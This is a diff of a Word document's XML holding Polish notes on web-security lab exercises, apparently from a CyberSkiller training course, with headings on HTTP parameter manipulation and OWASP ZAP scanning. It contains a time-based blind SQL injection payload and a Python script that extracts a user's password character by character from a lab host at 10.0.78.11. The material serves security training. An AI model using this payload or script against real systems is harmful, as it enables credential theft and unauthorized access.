+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>XXXX" union select if(password like 'CS%', sleep(5), "A") from users where username = '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>CyberSkiller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML-wstpniesformatowany"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFC66D"/>
+        </w:rPr>
+        <w:t>check_password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    URL = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>'http://10.0.78.11/?query=XXXX"+union+select+if%28password+like+%27CS{}%25%27%2C+sleep%281%29%2C+"A"%29+from+users+where+username+%3D+%27CyberSkiller%27+-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>-+a'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>url_with_password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>URL.format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>start_time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>time.time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>requests.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>url_with_password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>end_time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>time.time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">return </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>end_time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>start_time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>''</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>found</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>string.ascii_uppercase</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>string.digits</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>check_password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + i):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>found</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> not </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>found</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Podgląd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nagłówków</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>odpowiedzi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId27" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1033,19 +5326,32 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Manipulowanie parametrami HTTP </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId23" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Manipulowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>parametrami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1083,8 +5389,29 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Automatyczny skan aplikacji </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Automatyczny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>skan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aplikacji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1096,7 +5423,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId29" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1115,47 +5442,286 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">odpalamy OWASP -&gt; Automatyczne skanowanie -&gt; wpsujemy url, zaznaczamy Sidera -&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>wyszukujemy url ze sćieżką /robots.txt i sprawdzamy response i odczytujemy kod.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Modyfikacja żądań HTTP </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>odpalamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OWASP -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Automatyczne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>skanowanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wpsujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zaznaczamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Sidera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wyszukujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>sćieżką</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /robots.txt </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>sprawdzamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> response </w:t>
+      </w:r>
